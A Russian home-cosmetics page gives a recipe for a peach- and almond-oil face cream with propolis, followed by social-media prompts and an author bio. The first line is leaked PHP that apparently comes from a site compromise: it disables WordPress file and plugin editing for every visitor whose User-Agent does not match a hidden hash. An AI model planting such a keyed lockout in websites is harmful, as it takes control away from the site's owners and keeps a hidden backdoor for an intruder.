if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепт, как своими руками сделать крем с персиковым маслом | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт, как своими руками сделать крем с персиковым маслом

Использование замечательного домашнего крема-масла для лица на персиковом масле подарит массу приятных ощущений.

Исполь­зо­ва­ние заме­ча­тель­но­го домаш­не­го кре­ма-мас­ла для лица на пер­си­ко­вом мас­ле пода­рит мас­су при­ят­ных ощущений.

Для приготовления вам понадобиться:

  • мас­ло пер­си­ка 1 ч.л.;
  • мас­ло мин­да­ля 1 ч.л.;
  • сухой про­по­лис (5гр).

Приготовление

В первую оче­редь необ­хо­ди­мо при­го­то­вить настой про­по­ли­са. Для это­го необ­хо­ди­мо измель­чить про­по­лис и залить его кипя­че­ной теп­лой водой. На 5 гр про­по­ли­са необ­хо­ди­мо исполь­зо­вать 3 сто­ло­вые лож­ки воды. После это­го водя­ную смесь необ­хо­ди­мо оста­вить на водя­ной бане. Там в тече­ние часа эта смесь долж­на варить­ся. Необ­хо­ди­мо посто­ян­но поме­ши­вать эту смесь. После это­го смесь необ­хо­ди­мо снять, про­це­дить и охла­дить. После того как вытяж­ка из про­по­ли­са охла­дить­ся, ее мож­но сме­ши­вать с пер­си­ко­вым и мин­даль­ным мас­лом. Все ингре­ди­ен­ты долж­ны быть взя­ты по 1 сто­ло­вой лож­ке. Все необ­хо­ди­мо тща­тель­но пере­ме­шать. После это­го мож­но сде­лать вывод, что бес­плат­ная кос­ме­ти­ка – это не миф.

Применение

Ват­ным дис­ком, смо­чен­ным в полу­чен­ном мас­ле, необ­хо­ди­мо про­те­реть уже очи­щен­ную кожу. Исполь­зо­вать мож­но ежедневно.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!